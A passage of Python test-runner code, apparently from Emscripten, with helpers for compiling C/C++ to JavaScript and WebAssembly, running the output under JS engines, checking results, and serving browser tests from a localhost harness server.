def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
building.llvm_dis(output_obj, output_ll)
building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
"""URL decodes the `actual` parameter before checking for equality."""
self.assertIdentical(expected, unquote(actual), **kwargs)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(building.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in engines and not self.is_wasm_backend():
engines = [SPIDERMONKEY_ENGINE]
else:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
shared.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdenticalUrlEncoded(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
